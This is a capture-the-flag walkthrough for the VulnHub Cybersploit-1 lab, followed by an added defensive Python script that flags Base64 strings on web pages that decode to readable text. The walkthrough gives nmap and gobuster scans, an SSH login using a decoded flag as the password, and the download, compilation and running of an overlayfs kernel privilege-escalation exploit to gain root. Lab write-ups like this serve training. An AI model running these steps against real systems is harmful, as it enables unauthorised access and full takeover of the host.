machine link : https://www.vulnhub.com/entry/cybersploit-1,506/
step1 : USE netdiscover or arp-scan -l ------ to get the IP of the machine from the network
step2 : USE nmap -T4 -sCV -p- 192.168.0.103 -vv -Pn ------ to get the open ports of the machine
FINDING :
port 80 http is open
port 22 ssh is open
ssh version OpenSSH 5.9p1
step3 : open the IP in the browser ------ the site will open
step4 : explore the site and view the source ------ at the bottom you will get the user name itsskv
step5 : RUN gobuster dir -u http://192.168.0.103 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ------ you will get a /robots file, open it ------ http://192.168.0.103/robots ------ you will get a Base64-encoded string
R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9
step6 : OPEN http://hashes.com or https://www.base64decode.org/ ------ to decode the string ------ you will get the result Flag1: cybersploit{youtube.com/c/cybersploit}
step7 : login with ------ ssh [email protected] -p 22 ------ with the password cybersploit{youtube.com/c/cybersploit}
step8 : Inside ssh use whoami to find the user name ------ you will get ------ itsskv@cybersploit-CTF:~$
step9 : Use command uname -r ------ to find the kernel version ------ you will get ------ 3.13.0-32-generic
step10: Open a new terminal and type ------ searchsploit 3.13.0 ------ to find the exploit name ------ you will get ------ Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Local Privilege | linux/local/37292.c ------ search for it on Google
step11: The exploit is here: https://www.exploit-db.com/exploits/37292
step12: In the existing ssh session, cd /home/itsskv and run vi exploit.c ------ the text editor will open
step13: press i to enter insert mode and paste the exploit code, hit the enter key, press the esc key, type :wq and hit enter, then check with ls
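step14: Now compile the exploit with gcc exploit.c -o dirtycow.c -pthread, after that chmod +x dirtycow.c, and then run the exploit with ./dirtycow.c (dirtycow.c is only the name given to the compiled binary here; the code is the overlayfs exploit from step10)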
step15: Now run whoami ------ if all went well you will be root
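
Steps 5 to 7 work because a Base64 string served from the web root decodes to readable text that is reused as the SSH password. The following is an added example, not part of the original walkthrough: a check a defender could run over web-served files to flag Base64 tokens that decode to printable text. The function names, the 16-character minimum and the sample content are assumptions constructed for illustration.

```python
import base64
import binascii
import re
import string

MIN_LEN = 16  # assumption: shorter Base64-looking runs are mostly ordinary words
TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % MIN_LEN)
PRINTABLE = set(string.printable.encode())

# Constructed sample: a robots file carrying the string from step 5,
# plus an ordinary path that looks like Base64 but is not.
SAMPLE = (
    "User-agent: *\n"
    "Disallow: /downloads/manual/en\n"
    "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9\n"
)


def decode_if_text(token):
    """Return the decoded text if token is Base64 for printable ASCII, else None."""
    if len(token) % 4:
        return None  # padded Base64 is always a multiple of four characters
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw or any(b not in PRINTABLE for b in raw):
        return None  # binary output: a coincidental match, not hidden text
    return raw.decode("ascii")


def scan_text(name, text):
    """Return (name, line_no, token, decoded) for every readable Base64 token."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for match in TOKEN_RE.finditer(line):
            decoded = decode_if_text(match.group())
            if decoded is not None:
                findings.append((name, line_no, match.group(), decoded))
    return findings


if __name__ == "__main__":
    for name, line_no, token, decoded in scan_text("robots", SAMPLE):
        print(f"{name}:{line_no}: Base64 decodes to readable text: {decoded!r}")
```

Any finding is worth a review: Base64 is an encoding, not protection, so whatever it decodes to should be treated as public and never double as a credential.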